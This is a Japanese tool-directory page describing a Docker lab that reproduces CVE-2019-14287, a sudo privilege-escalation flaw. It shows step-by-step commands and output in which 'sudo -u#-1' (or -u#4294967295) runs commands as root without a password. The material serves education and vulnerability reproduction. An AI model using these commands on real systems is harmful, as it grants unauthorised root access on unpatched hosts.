Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
poc-cve-2019-14287 — DockerベースのPoCで、CVE-2019-14287のsudo権限昇格をRunasユーザー制限バイパスを介して実演し、ステップバイステップの再現手順を提供します。 | Kitploit
ツール/GitHubGitHub/lemonadern/poc-cve-2019-14287
特権昇格コンテナセキュリティ脆弱性分析エクスプロイト学習と教育ラボと実践
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

DockerベースのPoCで、CVE-2019-14287のsudo権限昇格をRunasユーザー制限バイパスを介して実演し、ステップバイステップの再現手順を提供します。

リポジトリを見る
141年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PoC of CVE-2019-14287

概要

sudo の脆弱性 (CVE-2019-14287) を Docker コンテナ上で再現するサンプルです。

演習手順

  1. docker compose up -d でコンテナを立ち上げる
  2. docker exec -it vulnerable_sudo_app bash でコンテナに入る
  3. whoamiや idコマンドを実行して、自分が一般ユーザである(rootでない)ことを確認
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. sudo -u#0 whoami や sudo -u#0 id -u が実行できないことを確認する
    • uid (-u オプション) に 0 (root)を指定して実行する
    • パスワードを求められるが、パスワードは知らないので実行できない
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. sudo -u#-1 whoami や sudo -u#-1 id -u を実行して、認証なしで root としてコマンドが実行できることを確認する(脆弱性の再現)
    • -u#4294967295 でも同様のことができる
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

参考

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • sudoの脆弱性(CVE-2019-14287)についてまとめてみた - Qiita
ツールをダウンロード